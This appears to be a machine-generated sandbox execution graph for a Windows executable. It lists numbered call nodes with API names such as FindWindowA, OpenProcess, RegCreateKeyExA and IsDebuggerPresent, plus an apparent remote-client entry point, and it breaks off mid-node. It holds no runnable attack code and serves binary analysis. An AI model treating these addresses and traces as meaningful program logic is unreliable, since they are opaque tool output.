                                                                                        Signature Coverage:21.2%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:126
                                                                                        execution_graph 66234 110179e0 GetTickCount 66241 110178f0 66234->66241 66242 11017910 66241->66242 66243 110179c6 66241->66243 66244 11017932 CoInitialize _GetRawWMIStringW 66242->66244 66246 11017929 WaitForSingleObject 66242->66246 66273 11162bb7 66243->66273 66247 110179b2 66244->66247 66250 11017965 66244->66250 66246->66244 66247->66243 66249 110179c0 CoUninitialize 66247->66249 66248 110179d5 66254 11017810 66248->66254 66249->66243 66250->66247 66251 110179ac 66250->66251 66281 111648ed 79 API calls __isdigit_l 66250->66281 66282 111646f7 68 API calls __fassign 66251->66282 66255 110178d6 66254->66255 66257 11017830 66254->66257 66256 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66255->66256 66260 110178e5 SetEvent GetTickCount 66256->66260 66258 11017848 CoInitialize _GetRawWMIStringW 66257->66258 66261 1101783f WaitForSingleObject 66257->66261 66259 110178c2 66258->66259 66263 1101787b 66258->66263 66259->66255 66262 110178d0 CoUninitialize 66259->66262 66267 11147060 66260->66267 66261->66258 66262->66255 66263->66259 66264 110178bc 66263->66264 66284 111648ed 79 API calls __isdigit_l 66263->66284 66285 111646f7 68 API calls __fassign 66264->66285 66268 11147071 66267->66268 66269 1114706c 66267->66269 66287 111464c0 66268->66287 66286 11146270 18 API calls std::locale::_Init 66269->66286 66274 11162bc1 IsDebuggerPresent 66273->66274 66275 11162bbf 66273->66275 66283 111784f7 66274->66283 66275->66248 66278 1116cb59 SetUnhandledExceptionFilter UnhandledExceptionFilter 66279 1116cb76 __call_reportfault 66278->66279 66280 1116cb7e GetCurrentProcess TerminateProcess 66278->66280 66279->66280 66280->66248 66281->66250 66282->66247 66283->66278 66284->66263 66285->66259 66286->66268 66290 11146370 66287->66290 66289 11017a27 66291 11146394 66290->66291 66292 11146399 66290->66292 66310 11146270 18 API calls std::locale::_Init 66291->66310 66294 11146402 66292->66294 66295 111463a2 66292->66295 66296 111464ae 66294->66296 66297 1114640f wsprintfA 66294->66297 66298 111463d9 66295->66298 66301 111463b0 66295->66301 66299 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66296->66299 66300 11146432 66297->66300 66304 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66298->66304 66302 111464ba 66299->66302 66300->66300 66303 11146439 wvsprintfA 66300->66303 66306 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66301->66306 66302->66289 66309 11146454 66303->66309 66305 111463fe 66304->66305 66305->66289 66307 111463d5 66306->66307 66307->66289 66308 111464a1 OutputDebugStringA 66308->66296 66309->66308 66309->66309 66310->66292 66311 110262c0 LoadLibraryA 66312 11031780 66313 1103178e 66312->66313 66317 11146a90 66313->66317 66316 110317af std::locale::_Init 66320 11145be0 66317->66320 66321 11145bf0 66320->66321 66321->66321 66326 11110230 66321->66326 66323 11145c02 66333 11145b10 66323->66333 66325 1103179f SetUnhandledExceptionFilter 66325->66316 66345 11163a11 66326->66345 66329 11110247 66362 11029a70 272 API calls 2 library calls 66329->66362 66330 1111025e _memset 66330->66323 66334 11145b27 _strncpy 66333->66334 66335 11145b62 _strupr_s_l_stat 66333->66335 66336 11145b45 66334->66336 66371 11143300 MultiByteToWideChar 66335->66371 66336->66336 66337 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66336->66337 66338 11145b5e 66337->66338 66338->66325 66340 11145b94 66372 11143340 WideCharToMultiByte GetLastError 66340->66372 66342 11145ba6 66343 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66342->66343 66344 11145bb9 66343->66344 66344->66325 66346 11163a8e 66345->66346 66359 11163a1f 66345->66359 66369 1116e368 DecodePointer 66346->66369 66348 11163a94 66370 1116a1af 67 API calls __getptd_noexit 66348->66370 66349 11163a2a 66349->66359 66363 1116e85d 67 API calls 2 library calls 66349->66363 66364 1116e6ae 67 API calls 6 library calls 66349->66364 66365 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 66349->66365 66352 11163a4d RtlAllocateHeap 66353 1111023e 66352->66353 66352->66359 66353->66329 66353->66330 66355 11163a7a 66367 1116a1af 67 API calls __getptd_noexit 66355->66367 66359->66349 66359->66352 66359->66355 66360 11163a78 66359->66360 66366 1116e368 DecodePointer 66359->66366 66368 1116a1af 67 API calls __getptd_noexit 66360->66368 66363->66349 66364->66349 66366->66359 66367->66360 66368->66353 66369->66348 66370->66353 66371->66340 66372->66342 66373 11041180 66374 110411b2 66373->66374 66375 110411b8 66374->66375 66382 110411d4 66374->66382 66377 110fb470 15 API calls 66375->66377 66376 110412e8 66378 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66376->66378 66379 110411ca CloseHandle 66377->66379 66381 110412f5 66378->66381 66379->66382 66380 11041268 66395 110fb470 GetTokenInformation 66380->66395 66382->66376 66385 1104120d 66382->66385 66405 110881d0 308 API calls 5 library calls 66382->66405 66385->66376 66385->66380 66386 1104127a 66387 11041282 CloseHandle 66386->66387 66390 11041289 66386->66390 66387->66390 66388 110412cb 66391 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66388->66391 66389 110412b1 66392 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66389->66392 66390->66388 66390->66389 66393 110412e4 66391->66393 66394 110412c7 66392->66394 66396 110fb4b8 66395->66396 66397 110fb4a7 66395->66397 66406 110f2300 9 API calls 66396->66406 66398 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66397->66398 66400 110fb4b4 66398->66400 66400->66386 66401 110fb4dc 66401->66397 66402 110fb4e4 66401->66402 66403 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66402->66403 66404 110fb50a 66403->66404 66404->66386 66405->66385 66406->66401 66407 11144dd0 66408 11144de1 66407->66408 66421 111447f0 66408->66421 66412 11144e65 66415 11144e82 66412->66415 66417 11144e64 66412->66417 66413 11144e2b 66414 11144e32 ResetEvent 66413->66414 66429 111449b0 272 API calls 2 library calls 66414->66429 66417->66412 66430 111449b0 272 API calls 2 library calls 66417->66430 66418 11144e46 SetEvent WaitForMultipleObjects 66418->66414 66418->66417 66420 11144e7f 66420->66415 66422 111447fc GetCurrentProcess 66421->66422 66423 1114481f 66421->66423 66422->66423 66424 1114480d GetModuleFileNameA 66422->66424 66428 11144849 WaitForMultipleObjects 66423->66428 66431 111101b0 66423->66431 66424->66423 66428->66412 66428->66413 66429->66418 66430->66420 66432 11163a11 _malloc 67 API calls 66431->66432 66433 111101ce 66432->66433 66434 11110203 _memset 66433->66434 66435 111101d7 wsprintfA 66433->66435 66438 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66434->66438 66454 11029a70 272 API calls 2 library calls 66435->66454 66439 1111021d 66438->66439 66439->66428 66440 11144140 GetModuleFileNameA 66439->66440 66441 111441c3 66440->66441 66442 11144183 66440->66442 66445 111441cf LoadLibraryA 66441->66445 66446 111441e9 GetModuleHandleA GetProcAddress 66441->66446 66455 11081e00 66442->66455 66444 11144191 66444->66441 66447 11144198 LoadLibraryA 66444->66447 66445->66446 66448 111441de LoadLibraryA 66445->66448 66449 11144217 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 66446->66449 66450 11144209 66446->66450 66447->66441 66448->66446 66451 11144243 10 API calls 66449->66451 66450->66451 66452 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66451->66452 66453 111442c0 66452->66453 66453->66428 66456 11081e13 _strrchr 66455->66456 66458 11081e2a std::locale::_Init 66456->66458 66459 11081c50 IsDBCSLeadByte 66456->66459 66458->66444 66459->66458 66460 aa1020 GetCommandLineA 66462 aa1035 GetStartupInfoA 66460->66462 66463 aa108b 66462->66463 66464 aa1090 GetModuleHandleA 66462->66464 66463->66464 66467 aa1000 _NSMClient32 66464->66467 66466 aa10a2 ExitProcess 66467->66466 66468 1102ebd0 66469 1102ec13 66468->66469 66470 111101b0 std::locale::_Init 272 API calls 66469->66470 66471 1102ec1a 66470->66471 66892 11143780 66471->66892 66474 1102ec91 66477 11143780 87 API calls 66474->66477 66476 1102ec76 66478 11081e70 88 API calls 66476->66478 66479 1102ecba 66477->66479 66478->66474 66484 1102ecc7 66479->66484 67570 11163ca7 66479->67570 66481 1102ecf6 66482 1102ed68 66481->66482 66483 1102ed4f GetSystemMetrics 66481->66483 66486 1102ed82 CreateEventA 66482->66486 66483->66482 66485 1102ed5e 66483->66485 66484->66481 66487 11145c70 std::locale::_Init 93 API calls 66484->66487 66488 11147060 std::locale::_Init 21 API calls 66485->66488 66489 1102ed95 66486->66489 66490 1102eda9 66486->66490 66487->66481 66488->66482 67574 11029a70 272 API calls 2 library calls 66489->67574 66492 111101b0 std::locale::_Init 272 API calls 66490->66492 66493 1102edb0 66492->66493 66494 1102edd0 66493->66494 67575 11110de0 66493->67575 66496 111101b0 std::locale::_Init 272 API calls 66494->66496 66497 1102ede4 66496->66497 66498 11110de0 436 API calls 66497->66498 66499 1102ee04 66497->66499 66498->66499 66500 111101b0 std::locale::_Init 272 API calls 66499->66500 66501 1102ee83 66500->66501 66502 1102eeb3 66501->66502 67603 11061aa0 66501->67603 66504 111101b0 std::locale::_Init 272 API calls 66502->66504 66505 1102eecd 66504->66505 66506 1102eef2 FindWindowA 66505->66506 67620 11061710 66505->67620 66509 1102f032 66506->66509 66510 1102ef2b 66506->66510 66898 11061ef0 66509->66898 66510->66509 66514 1102ef43 GetWindowThreadProcessId 66510->66514 66513 11061ef0 275 API calls 66515 1102f050 66513->66515 66516 11147060 std::locale::_Init 21 API calls 66514->66516 66517 11061ef0 275 API calls 66515->66517 66518 1102ef60 OpenProcess 66516->66518 66520 1102f05c 66517->66520 66518->66509 66519 1102ef7d 66518->66519 67633 11094f00 106 API calls 66519->67633 66522 1102f073 66520->66522 66523 1102f06a 66520->66523 66905 111464e0 66522->66905 67634 11028360 121 API calls 2 library calls 66523->67634 66524 1102ef9c 66526 11147060 std::locale::_Init 21 API calls 66524->66526 66529 1102efb0 66526->66529 66527 1102f06f 66527->66522 66531 1102efef CloseHandle FindWindowA 66529->66531 66534 11147060 std::locale::_Init 21 API calls 66529->66534 66530 1102f082 66532 1102f086 66530->66532 66920 1102a6d0 IsJPIK 66530->66920 66535 1102f022 66531->66535 66536 1102f014 GetWindowThreadProcessId 66531->66536 66936 11145990 ExpandEnvironmentStringsA 66532->66936 66538 1102efc2 SendMessageA WaitForSingleObject 66534->66538 66539 11147060 std::locale::_Init 21 API calls 66535->66539 66536->66535 66538->66531 66541 1102efe2 66538->66541 66542 1102f02f 66539->66542 66544 11147060 std::locale::_Init 21 API calls 66541->66544 66542->66509 66546 1102efec 66544->66546 66545 1102f0b5 66547 1102f177 66545->66547 66958 11063880 66545->66958 66546->66531 66973 11027b20 66547->66973 66551 110b7df0 std::locale::_Init 9 API calls 66552 1102f0e3 66551->66552 66553 11147060 std::locale::_Init 21 API calls 66552->66553 66557 1102f0f2 66553->66557 67715 11143690 66892->67715 66894 11166654 86 API calls std::locale::_Init 66896 11143795 66894->66896 66895 11143690 IsDBCSLeadByte 66895->66896 66896->66894 66896->66895 66897 1102ec64 66896->66897 66897->66474 67560 11081e70 66897->67560 66899 11061f66 66898->66899 66904 11061f17 66898->66904 66900 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66899->66900 66901 1102f044 66900->66901 66901->66513 66902 11081e70 88 API calls 66902->66904 66904->66899 66904->66902 67727 11061e10 275 API calls 4 library calls 66904->67727 67728 111457a0 66905->67728 66908 111457a0 std::locale::_Init 272 API calls 66909 11146517 wsprintfA 66908->66909 66910 11143e00 std::locale::_Init 8 API calls 66909->66910 66911 11146534 66910->66911 66912 11146560 66911->66912 66914 11143e00 std::locale::_Init 8 API calls 66911->66914 66913 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66912->66913 66915 1114656c 66913->66915 66916 11146549 66914->66916 66915->66530 66916->66912 66917 11146550 66916->66917 66918 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66917->66918 66919 1114655c 66918->66919 66919->66530 66921 1102a705 66920->66921 66922 1102a7d3 66920->66922 66923 111101b0 std::locale::_Init 272 API calls 66921->66923 66922->66532 66924 1102a70c 66923->66924 66925 1102a73b 66924->66925 66926 11061aa0 310 API calls 66924->66926 66927 11063880 344 API calls 66925->66927 66926->66925 66928 1102a759 66927->66928 66928->66922 67806 110d1930 66928->67806 66930 1102a7c7 66932 110d0a10 272 API calls 66930->66932 66931 1102a765 66931->66930 66933 1102a798 66931->66933 66932->66922 67816 110d0a10 66933->67816 66937 111459c7 66936->66937 66938 111459e4 std::locale::_Init 66937->66938 66939 111459fe 66937->66939 66945 111459d4 66937->66945 66941 111459f5 GetModuleFileNameA 66938->66941 66940 111457a0 std::locale::_Init 272 API calls 66939->66940 66942 11145a04 66940->66942 66941->66942 66943 11081e00 std::locale::_Init IsDBCSLeadByte 66942->66943 66943->66945 66944 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66946 1102f0a3 66944->66946 66945->66944 66947 11143e00 66946->66947 66948 11143e21 66947->66948 66948->66948 66949 11143e7d CreateFileA 66948->66949 66950 11143ebe CloseHandle 66949->66950 66951 11143e9e 66949->66951 66954 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66950->66954 66952 11143ea2 CreateFileA 66951->66952 66953 11143edb 66951->66953 66952->66950 66952->66953 66955 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 66953->66955 66956 11143ed7 66954->66956 66957 11143eea 66955->66957 66956->66545 66957->66545 66959 1105e820 79 API calls 66958->66959 66960 110638a8 66959->66960 67903 110627b0 66960->67903 66962 1102f0d6 66962->66547 66962->66551 66964 1105e950 5 API calls 66965 11063909 std::locale::_Init 66964->66965 66966 1105e820 79 API calls 66965->66966 66967 1106393d 66966->66967 66968 1106395c 66967->66968 66970 1105e950 5 API calls 66967->66970 66969 1105e820 79 API calls 66968->66969 66970->66968 68928 11061a70 66973->68928 66976 1105e820 79 API calls 66978 11027b69 66976->66978 67561 11081e7d 67560->67561 67562 11081e82 67560->67562 70299 11081c50 IsDBCSLeadByte 67561->70299 67564 11081e8b 67562->67564 67568 11081e9f 67562->67568 70300 1116558e 86 API calls 2 library calls 67564->70300 67566 11081e98 67566->66476 67567 11081f03 67567->66476 67568->67567 67569 11166654 86 API calls std::locale::_Init 67568->67569 67569->67568 67571 11163c91 67570->67571 67572 1116450b __wcstoi64 79 API calls 67571->67572 67573 11163ca2 67572->67573 67573->66484 67576 111101b0 std::locale::_Init 272 API calls 67575->67576 67577 11110e11 67576->67577 67578 11110e33 GetCurrentThreadId InitializeCriticalSection 67577->67578 67579 111101b0 std::locale::_Init 272 API calls 67577->67579 67582 11110ea0 EnterCriticalSection 67578->67582 67583 11110e93 InitializeCriticalSection 67578->67583 67581 11110e2c 67579->67581 67581->67578 70301 1116305a std::exception::_Copy_str 67581->70301 67584 11110f5a LeaveCriticalSection 67582->67584 67585 11110ece CreateEventA 67582->67585 67583->67582 67584->66494 67586 11110ee1 67585->67586 67587 11110ef8 67585->67587 70303 11029a70 272 API calls 2 library calls 67586->70303 67590 111101b0 std::locale::_Init 272 API calls 67587->67590 67593 11110eff 67590->67593 67591 11110e4f 70302 111634b1 RaiseException 67591->70302 67595 11110de0 430 API calls 67593->67595 67596 11110f1c 67593->67596 67595->67596 67597 111101b0 std::locale::_Init 272 API calls 67596->67597 67598 11110f2c 67597->67598 67599 11110f3d 67598->67599 70304 11110280 InterlockedIncrement InterlockedIncrement CreateEventA 67598->70304 67601 11110040 430 API calls 67599->67601 67602 11110f55 67601->67602 67602->67584 67604 11061710 301 API calls 67603->67604 67605 11061ade 67604->67605 67606 111101b0 std::locale::_Init 272 API calls 67605->67606 67607 11061b0b 67606->67607 67608 11061710 301 API calls 67607->67608 67609 11061b24 67607->67609 67608->67609 67610 111101b0 std::locale::_Init 272 API calls 67609->67610 67611 11061b35 67610->67611 67612 11061710 301 API calls 67611->67612 67614 11061b4e 67611->67614 67612->67614 67613 11061ba2 67613->66502 67614->67613 67615 11061a70 283 API calls 67614->67615 67616 11061b86 67615->67616 67617 11061a70 283 API calls 67616->67617 67618 11061b94 67617->67618 67619 11061a70 283 API calls 67618->67619 67619->67613 67621 111101b0 std::locale::_Init 272 API calls 67620->67621 67622 11061761 67621->67622 67627 11061777 InitializeCriticalSection 67622->67627 70305 11061210 274 API calls 3 library calls 67622->70305 67625 110617b7 70306 1105f830 294 API calls 3 library calls 67625->70306 67626 11061826 67626->66506 67627->67625 67627->67626 67629 110617d8 RegCreateKeyExA 67630 11061832 RegCreateKeyExA 67629->67630 67631 110617ff RegCreateKeyExA 67629->67631 67630->67626 67632 11061865 RegCreateKeyExA 67630->67632 67631->67626 67631->67630 67632->67626 67633->66524 67634->66527 67716 111436a6 67715->67716 67718 11143763 67716->67718 67722 11081d30 67716->67722 67718->66896 67719 111436cb 67720 11081d30 IsDBCSLeadByte 67719->67720 67721 111436fb _memmove 67720->67721 67721->66896 67723 11081d3c 67722->67723 67725 11081d41 __mbschr_l std::locale::_Init 67722->67725 67726 11081c50 IsDBCSLeadByte 67723->67726 67725->67719 67726->67725 67727->66904 67729 111457c2 67728->67729 67732 111457d9 std::locale::_Init 67728->67732 67768 11029a70 272 API calls 2 library calls 67729->67768 67734 1114580c GetModuleFileNameA 67732->67734 67749 11145918 67732->67749 67733 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 67735 11145983 wsprintfA 67733->67735 67736 11081e00 std::locale::_Init IsDBCSLeadByte 67734->67736 67735->66908 67737 11145821 67736->67737 67738 11145831 SHGetFolderPathA 67737->67738 67737->67749 67739 1114585e 67738->67739 67742 1114587d SHGetFolderPathA 67738->67742 67741 11145864 67739->67741 67739->67742 67769 11029a70 272 API calls 2 library calls 67741->67769 67743 111458b2 std::locale::_Init 67742->67743 67746 1102ad70 std::locale::_Init 148 API calls 67743->67746 67747 111458c3 67746->67747 67750 11145240 67747->67750 67749->67733 67749->67749 67751 111452ca 67750->67751 67752 1114524b 67750->67752 67751->67749 67752->67751 67753 1114525b GetFileAttributesA 67752->67753 67754 11145275 67753->67754 67755 11145267 67753->67755 67770 11164bb8 67754->67770 67755->67749 67758 11081e00 std::locale::_Init IsDBCSLeadByte 67759 11145286 67758->67759 67760 11145240 std::locale::_Init 69 API calls 67759->67760 67766 111452a3 67759->67766 67761 11145296 67760->67761 67762 111452ac 67761->67762 67763 1114529e 67761->67763 67778 11163aa5 67762->67778 67764 11163aa5 _free 67 API calls 67763->67764 67764->67766 67766->67749 67767 111452b1 CreateDirectoryA 67767->67766 67771 11164bc9 _strlen 67770->67771 67774 1114527c 67770->67774 67772 11163a11 _malloc 67 API calls 67771->67772 67773 11164bdc 67772->67773 67773->67774 67784 1116cd5f 67773->67784 67774->67758 67779 11163ab0 HeapFree 67778->67779 67780 11163ad9 __dosmaperr 67778->67780 67779->67780 67781 11163ac5 67779->67781 67780->67767 67805 1116a1af 67 API calls __getptd_noexit 67781->67805 67783 11163acb GetLastError 67783->67780 67785 1116cd74 67784->67785 67786 1116cd6d 67784->67786 67796 1116a1af 67 API calls __getptd_noexit 67785->67796 67786->67785 67788 1116cd92 67786->67788 67791 11164bee 67788->67791 67798 1116a1af 67 API calls __getptd_noexit 67788->67798 67789 1116cd79 67797 1116edc4 11 API calls _strcat_s 67789->67797 67791->67774 67793 1116ed72 67791->67793 67799 1116ec49 67793->67799 67796->67789 67797->67791 67798->67789 67800 1116ec68 _memset __call_reportfault 67799->67800 67801 1116ec86 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 67800->67801 67802 1116ed54 __call_reportfault 67801->67802 67803 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 67802->67803 67804 1116ed70 GetCurrentProcess TerminateProcess 67803->67804 67804->67774 67805->67783 67825 110d16d0 67806->67825 67809 110d197b 67812 110d1995 67809->67812 67813 110d1978 67809->67813 67810 110d1964 67839 11029a70 272 API calls 2 library calls 67810->67839 67812->66931 67813->67809 67840 11029a70 272 API calls 2 library calls 67813->67840 67898 110d0810 67816->67898 67819 110d0a39 67822 11163aa5 _free 67 API calls 67819->67822 67820 110d0a22 67902 11029a70 272 API calls 2 library calls 67820->67902 67824 1102a7a4 67822->67824 67824->66532 67826 110d16dc 67825->67826 67827 110d16f7 67826->67827 67828 110d16e0 67826->67828 67841 110d03e0 67827->67841 67870 11029a70 272 API calls 2 library calls 67828->67870 67835 110d172e 67835->67809 67835->67810 67836 110d1717 67871 11029a70 272 API calls 2 library calls 67836->67871 67842 110d03e9 67841->67842 67843 110d03ed 67842->67843 67844 110d0404 67842->67844 67872 11029a70 272 API calls 2 library calls 67843->67872 67846 110d0401 67844->67846 67847 110d0438 67844->67847 67846->67844 67873 11029a70 272 API calls 2 library calls 67846->67873 67848 110d0435 67847->67848 67849 110d0456 67847->67849 67848->67847 67874 11029a70 272 API calls 2 library calls 67848->67874 67853 110d12e0 67849->67853 67854 110d12ee 67853->67854 67855 110d1309 67854->67855 67856 110d12f2 67854->67856 67857 110d133c 67855->67857 67860 110d1306 67855->67860 67875 11029a70 272 API calls 2 library calls 67856->67875 67859 110d13b0 67857->67859 67877 110d0c30 67857->67877 67859->67835 67859->67836 67860->67855 67876 11029a70 272 API calls 2 library calls 67860->67876 67866 110d136f _memmove 67866->67859 67867 110d1399 67866->67867 67889 11029a70 272 API calls 2 library calls 67867->67889 67878 110d0c3d 67877->67878 67879 110d0c58 67878->67879 67880 110d0c41 67878->67880 67882 110d0c55 67879->67882 67883 110d0c76 67879->67883 67895 11029a70 272 API calls 2 library calls 67880->67895 67882->67879 67896 11029a70 272 API calls 2 library calls 67882->67896 67890 110d06a0 67883->67890 67888 110d0b70 275 API calls 2 library calls 67888->67866 67891 110d06ab 67890->67891 67892 110d06c2 67890->67892 67897 11029a70 272 API calls 2 library calls 67891->67897 67892->67866 67892->67888 67899 110d0829 67898->67899 67901 110d083c 67898->67901 67900 110d06a0 272 API calls 67899->67900 67899->67901 67900->67901 67901->67819 67901->67820 68023 11145a70 67903->68023 67905 1106283c 67906 110d1930 275 API calls 67905->67906 67907 11062850 67906->67907 67908 11062a37 67907->67908 67958 11062864 std::ios_base::_Ios_base_dtor 67907->67958 68032 1116535d 67907->68032 67913 1116535d _fgets 82 API calls 67908->67913 67909 110637a8 67910 110d0a10 272 API calls 67909->67910 67951 11062931 std::ios_base::_Ios_base_dtor 67910->67951 67912 11164c77 std::locale::_Init 105 API calls 67912->67909 67914 11062a51 67913->67914 67918 11062ab7 _strpbrk 67914->67918 67919 11062a58 67914->67919 67915 110628e7 67916 110628ee 67915->67916 67930 1106293d _strpbrk std::locale::_Init 67915->67930 67917 11062923 67916->67917 68079 11164c77 67916->68079 67922 110d0a10 272 API calls 67917->67922 68051 11164536 67918->68051 67920 11062a9d 67919->67920 67925 11164c77 std::locale::_Init 105 API calls 67919->67925 67926 110d0a10 272 API calls 67920->67926 67922->67951 67924 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 67928 110637df 67924->67928 67925->67920 67926->67951 67928->66962 67928->66964 67928->66965 67931 11163ca7 std::locale::_Init 79 API calls 67930->67931 67932 110629ad 67931->67932 67933 11145b10 9 API calls 67932->67933 67935 110629c9 67933->67935 67935->67908 67939 110629d8 67935->67939 67940 11062a1d 67939->67940 67944 11164c77 std::locale::_Init 105 API calls 67939->67944 67944->67940 67951->67924 67958->67909 67958->67912 68029 11145a83 std::ios_base::_Ios_base_dtor 68023->68029 68024 11145990 274 API calls 68024->68029 68026 11145aea std::ios_base::_Ios_base_dtor 68026->67905 68027 11145aa5 GetLastError 68028 11145ab0 Sleep 68027->68028 68027->68029 68030 11164ead std::locale::_Init 145 API calls 68028->68030 68029->68024 68029->68026 68029->68027 68125 11164ead 68029->68125 68031 11145ac2 68030->68031 68031->68026 68031->68029 68033 11165369 __alloc_osfhnd 68032->68033 68034 1116537c 68033->68034 68035 111653ad 68033->68035 68541 1116a1af 67 API calls __getptd_noexit 68034->68541 68041 1116538c __alloc_osfhnd 68035->68041 68515 1116be59 68035->68515 68037 11165381 68542 1116edc4 11 API calls _strcat_s 68037->68542 68041->67915 68043 1116545e 68552 1116548d LeaveCriticalSection LeaveCriticalSection _fgets 68043->68552 68045 11165431 68045->68043 68521 11172885 68045->68521 68048 111653cc 68048->68045 68550 1116a1af 67 API calls __getptd_noexit 68048->68550 68049 11165426 68551 1116edc4 11 API calls _strcat_s 68049->68551 68052 1116454f 68051->68052 68611 111642e0 68052->68611 68080 11164c83 __alloc_osfhnd 68079->68080 68081 11164c95 68080->68081 68082 11164caa 68080->68082 68874 1116a1af 67 API calls __getptd_noexit 68081->68874 68084 1116be59 __lock_file 68 API calls 68082->68084 68090 11164ca5 __alloc_osfhnd 68082->68090 68086 11164cc3 68084->68086 68085 11164c9a 68090->67917 68128 11164df1 68125->68128 68127 11164ebf 68127->68029 68131 11164dfd __alloc_osfhnd 68128->68131 68129 11164e10 68184 1116a1af 67 API calls __getptd_noexit 68129->68184 68131->68129 68133 11164e3d 68131->68133 68132 11164e15 68185 1116edc4 11 API calls _strcat_s 68132->68185 68145 11172558 68133->68145 68136 11164e42 68137 11164e56 68136->68137 68138 11164e49 68136->68138 68142 11164e20 __alloc_osfhnd @_EH4_CallFilterFunc@8 68142->68127 68146 11172564 __alloc_osfhnd 68145->68146 68188 1117459f 68146->68188 68148 111725e7 68195 11172682 68148->68195 68149 111725ee 68227 1116ac39 68149->68227 68153 11172677 __alloc_osfhnd 68153->68136 68154 11172603 InitializeCriticalSectionAndSpinCount 68155 11172636 EnterCriticalSection 68154->68155 68156 11172623 68154->68156 68155->68148 68160 11172572 68160->68148 68160->68149 68198 111744dd 68160->68198 68225 1116be9a 68 API calls __lock 68160->68225 68226 1116bf08 LeaveCriticalSection LeaveCriticalSection _doexit 68160->68226 68184->68132 68185->68142 68189 111745c7 EnterCriticalSection 68188->68189 68190 111745b4 68188->68190 68189->68160 68191 111744dd __mtinitlocknum 66 API calls 68190->68191 68192 111745ba 68191->68192 68192->68189 68233 1116e66a 67 API calls 3 library calls 68192->68233 68234 111744c6 LeaveCriticalSection 68195->68234 68197 11172689 68197->68153 68199 111744e9 __alloc_osfhnd 68198->68199 68200 11174511 68199->68200 68201 111744f9 68199->68201 68204 1116ac39 __malloc_crt 66 API calls 68200->68204 68207 1117451f __alloc_osfhnd 68200->68207 68235 1116e85d 67 API calls 2 library calls 68201->68235 68203 111744fe 68236 1116e6ae 67 API calls 6 library calls 68203->68236 68206 1117452a 68204->68206 68209 11174531 68206->68209 68210 11174540 68206->68210 68207->68160 68208 11174505 68238 1116a1af 67 API calls __getptd_noexit 68209->68238 68225->68160 68226->68160 68229 1116ac42 68227->68229 68228 11163a11 _malloc 66 API calls 68228->68229 68229->68228 68230 1116ac78 68229->68230 68231 1116ac59 Sleep 68229->68231 68230->68148 68230->68154 68232 1116ac6e 68231->68232 68232->68229 68232->68230 68234->68197 68235->68203 68236->68208 68238->68207 68516 1116be8d EnterCriticalSection 68515->68516 68517 1116be6b 68515->68517 68519 111653bb 68516->68519 68517->68516 68518 1116be73 68517->68518 68520 1117459f __lock 67 API calls 68518->68520 68519->68045 68543 1116a147 68519->68543 68520->68519 68522 11172892 68521->68522 68526 111728a7 68521->68526 68583 1116a1af 67 API calls __getptd_noexit 68522->68583 68524 11172897 68584 1116edc4 11 API calls _strcat_s 68524->68584 68527 111728dc 68526->68527 68532 111728a2 68526->68532 68585 11177ff0 68526->68585 68529 1116a147 _fgets 67 API calls 68527->68529 68530 111728f0 68529->68530 68532->68045 68541->68037 68542->68041 68544 1116a153 68543->68544 68545 1116a168 68543->68545 68609 1116a1af 67 API calls __getptd_noexit 68544->68609 68545->68048 68547 1116a158 68610 1116edc4 11 API calls _strcat_s 68547->68610 68549 1116a163 68549->68048 68550->68049 68551->68045 68552->68041 68583->68524 68584->68532 68586 1116ac39 __malloc_crt 67 API calls 68585->68586 68587 11178005 68586->68587 68587->68527 68609->68547 68610->68549 68623 11164259 68611->68623 68613 11164304 68631 1116a1af 67 API calls __getptd_noexit 68613->68631 68619 1116433a 68621 11164381 68619->68621 68633 11171a63 79 API calls _LocaleUpdate::_LocaleUpdate 68619->68633 68622 11062ae1 68621->68622 68634 1116a1af 67 API calls __getptd_noexit 68621->68634 68624 111642b9 68623->68624 68625 1116426c 68623->68625 68624->68613 68624->68619 68635 1116c675 68625->68635 68633->68619 68634->68622 68656 1116c5fc GetLastError 68635->68656 68874->68085 68932 11061970 68928->68932 68943 11061290 68932->68943 68934 110619ba 68951 11061320 68934->68951 68936 11061a08 68984 11061170 68936->68984 68938 11061a1a 68940 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 68938->68940 68939 110619cc 68939->68936 68941 11061320 283 API calls 68939->68941 68942 11027b54 68940->68942 68941->68939 68942->66976 68944 111101b0 